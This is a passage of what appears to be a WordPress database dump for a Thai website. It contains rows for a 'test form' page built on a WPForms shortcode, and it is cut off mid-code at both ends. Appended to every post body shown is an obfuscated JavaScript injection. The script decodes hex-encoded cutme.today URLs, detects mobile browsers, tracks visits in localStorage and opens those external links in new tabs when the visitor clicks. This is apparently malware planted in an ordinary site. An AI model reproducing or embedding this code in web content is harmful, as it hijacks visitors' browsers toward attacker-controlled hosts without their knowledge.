_0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','Blank Form','','inherit','closed','closed','','1102-revision-v1','','','2024-09-05 20:29:23','2024-09-05 13:29:23','',1102,'http://pakhaeng.ssk.in.th/?p=1104',0,'revision','',0),
(1105,1,'2024-09-05 20:31:02','2024-09-05 13:31:02','<!-- wp:shortcode -->\n[wpforms id=\"1102\"]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ทดสอบฟอร์ม','','publish','closed','closed','','%e0%b8%97%e0%b8%94%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%9f%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%a1','','','2024-09-05 20:31:03','2024-09-05 13:31:03','',0,'http://pakhaeng.ssk.in.th/?page_id=1105',0,'page','',0),
(1106,1,'2024-09-05 20:31:02','2024-09-05 13:31:02','<!-- wp:shortcode -->\n[wpforms id=\"1102\"]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 